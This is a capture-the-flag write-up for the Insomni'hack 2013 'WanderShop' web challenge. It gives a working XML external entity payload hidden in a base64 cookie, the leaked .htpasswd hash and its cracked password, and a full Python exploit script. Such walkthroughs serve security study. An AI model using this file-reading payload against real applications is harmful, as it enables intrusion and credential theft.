InsomniHack-2013/Web2/WanderShop

From Fixme.ch
Jump to: navigation, search

Summary

If we are to survive this world, we are going to need some weapons. This shady merchant seems to be selling some interesting stuff. Unfortunately, we have absolutely no cash for this.
Could you break into his shop and get us as many items as you can?
Goal : Access the admin page

Solution

  • The admin page is protected with http auth on /admin
  • The shop items are saved in a cookie. Which decodes to an xml description of the basket, base64 and url encoded.
In [11]: a='PD94bWwgdmVyc2lvbj0iMS4wIj8%2BCjxiYXNrZXQ%2BCiAgICA8aXRlbSB0eXBlPSI1IiBuYW1lPSJT%0Ad29yZCI%2BNTwvaXRlbT4KICAgIDxpdGVtIHR5cGU9IjQiIG5hbWU9IktuaWZlIj40PC9pdGVtPgo8%0AL2Jhc2tldD4KCg%3D%3D'

In [12]: print base64.decodestring(urllib2.unquote(a))
<?xml version="1.0"?>
<basket>
    <item type="5" name="Sword">5</item>
    <item type="4" name="Knife">4</item>
</basket>
  • We can then inject XML with the cookie, we use XML external entities which allow to manipulate local files and display the result in the XML
<!DOCTYPE basket
[
<!ENTITY item SYSTEM "admin/.htpasswd">
]>
<basket>
    <item type="5" name="asd">&item;</item>
</basket>
  • The result of the XML is parsed and displayed in the paying page, so we put the content of the .htpasswd file in an item element which will be displayed in the table.
  • Here's the HTML result
<!DOCTYPE html>
<html lang="en">
<head>
<title>Wander Shop</title>
<link rel="StyleSheet" href="css/bootstrap.min.css" type="text/css"/>
<script src="js/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
    <h1>Wander Shop</h1>
    Verify your cart:<table class='table table-condensed'><tr><td>admin:sQcHhNWX6v1VM
    </td><td>x</td><td>asd</td></tr></table>
    <form action="pay.php">
    <input type="submit" value="Pay"/>
    </form>
    </div>
    </body>
    </html>
  • The password is in CRYPT format, which is easily bruteforced with john the ripper
echo 'admin:sQcHhNWX6v1VM' > /tmp/pass
john /tmp/pass
>slamas           (admin)
  • The flag is in the admin page
  • Complete script
#!/usr/bin/env python
 
import requests, urllib2, base64
 
url = 'http://web02.insomni.hack/1a5b4e6f811a0bc0dcb8fdd773bdb51c571be4e6/'
payload='''
<!DOCTYPE basket
[
<!ENTITY item SYSTEM "admin/.htpasswd">
]>
<basket>
    <item type="5" name="asd">&item;</item>
</basket>
'''
 
payload = urllib2.quote(base64.encodestring(payload))
 
cookie = {'basket': payload}
r = requests.get(url + 'checkout.php', cookies=cookie)
print r.content

See also

Retrieved from "https://fixme.ch/w/index.php?title=InsomniHack-2013/Web2/WanderShop&oldid=4135"